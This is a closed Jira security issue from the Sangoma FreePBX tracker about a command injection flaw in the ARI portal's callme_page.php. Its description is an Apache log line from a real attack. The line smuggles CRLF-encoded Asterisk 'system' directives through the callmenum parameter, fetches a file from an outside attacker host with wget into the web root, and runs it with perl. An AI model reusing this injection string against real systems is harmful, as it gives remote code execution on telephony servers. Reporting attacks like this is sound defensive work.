[FREEPBX-9087] security bug in /recordings/misc/callme_page.php - Sangoma Issue Tracker

XML

Word

Printable

Details

Type: Bug
Status: Closed
Priority: Minor
Resolution: Fixed
Affects Version/s: 2.11
Fix Version/s: None
Component/s: ARI User Portal
Labels:
- bug
- callme_page
- recordings
- security
- user_panel

ToDo:

Description


88.204.239.111 - - [11/Apr/2015:22:39:09 +0300] "GET //recordings/misc/callme_page.php?action=c&callmenum=555@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20wget%20http://www.{color:red}hackserver.zone{color}/kick.txt%20-O%20/var/www/html/recordings/kick.php;perl%20-MIO%20-e%20/var/www/html/recordings/kick.php%0D%0A%0D%0A HTTP/1.1" 200 - "-" "-"

This log of apache server

Gliffy Diagrams

Attachments

Options
- Sort By Name
- Sort By Date
- Ascending
- Descending
- Thumbnails
- List
- Download All

Attachments

mmmmmshellllll.txt
35 kB
15/Apr/15 6:38 AM

Activity

People

Assignee:

Unassigned

Reporter:

Alexander Burdin

Votes:

0 Vote for this issue

Watchers:

4 Start watching this issue

Dates

Created:

15/Apr/15 6:40 AM

Updated:

02/Mar/18 7:50 PM

Resolved:

15/Apr/15 3:29 PM

NextupJiraPlusStatus

Error rendering 'slack.nextup.jira:nextup-jira-plus-status'. Please contact your Jira administrators.